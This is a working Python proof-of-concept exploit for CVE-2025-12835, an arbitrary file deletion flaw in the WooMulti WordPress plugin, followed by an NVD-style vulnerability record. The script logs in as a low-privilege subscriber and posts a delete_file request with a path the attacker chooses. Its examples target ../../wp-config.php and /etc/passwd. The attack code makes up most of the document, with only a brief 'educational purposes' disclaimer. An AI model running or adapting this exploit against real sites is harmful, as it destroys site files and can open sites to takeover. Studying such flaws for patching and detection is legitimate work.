CVE-2025-12835

import requests import sys from urllib.parse import urlencode # CVE-2025-12835 PoC - WooMulti Plugin Arbitrary File Delete # Author: Security Researcher # Note: This is for educational purposes only TARGET_URL = "http://target-wordpress-site.com" USERNAME = "subscriber_user" # Low privilege account PASSWORD = "password123" def get_wordpress_nonce(login_url): """Get WordPress login nonce""" response = requests.get(login_url, timeout=10) return response.cookies.get_dict() def authenticate(login_url, username, password, cookies): """Authenticate as WordPress user""" auth_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } response = requests.post(login_url, data=auth_data, cookies=cookies, allow_redirects=True) return response.cookies def exploit_arbitrary_file_delete(target_url, auth_cookies, file_path): """ Exploit WooMulti plugin arbitrary file deletion file_path: Relative or absolute path to file to delete Example: ../../wp-config.php or /etc/passwd (if permissions allow) """ exploit_url = f"{target_url}/wp-admin/admin.php" # Construct the malicious request exploit_data = { 'page': 'woomulti-settings', # Plugin page 'action': 'delete_file', # Delete action 'file': file_path # Arbitrary file path (vulnerability point) } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Referer': exploit_url } print(f"[*] Sending delete request for: {file_path}") response = requests.post(exploit_url, data=exploit_data, cookies=auth_cookies, headers=headers) if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[*] Check if {file_path} was deleted") else: print(f"[-] Request failed with status: {response.status_code}") return response def main(): if len(sys.argv) < 3: print("Usage: python cve-2025-12835.py <target_url> <file_to_delete>") print("Example: python cve-2025-12835.py http://example.com ../../wp-config.php") sys.exit(1) target_url = sys.argv[1].rstrip('/') file_to_delete = sys.argv[2] login_url = f"{target_url}/wp-login.php" print("[*] CVE-2025-12835 - WooMulti Plugin Arbitrary File Delete") print("[*] Target:", target_url) print("[*] File to delete:", file_to_delete) # Step 1: Get initial cookies cookies = get_wordpress_nonce(login_url) # Step 2: Authenticate print("[*] Authenticating as subscriber user...") auth_cookies = authenticate(login_url, USERNAME, PASSWORD, cookies) # Step 3: Exploit print("[*] Exploiting...") exploit_arbitrary_file_delete(target_url, auth_cookies, file_to_delete) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-12835", "sourceIdentifier": "[email protected]", "published": "2025-12-12T11:15:50.150", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WooMulti WordPress plugin through 17 does not validate a file parameter when deleting files, which could allow any authenticated users, such as subscriber to delete arbitrary files on the server."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.2}]}, "references": [{"url": "https://wpscan.com/vulnerability/1650ddac-04c7-47fa-b03e-bd0338243fcc/", "source": "[email protected]"}]}}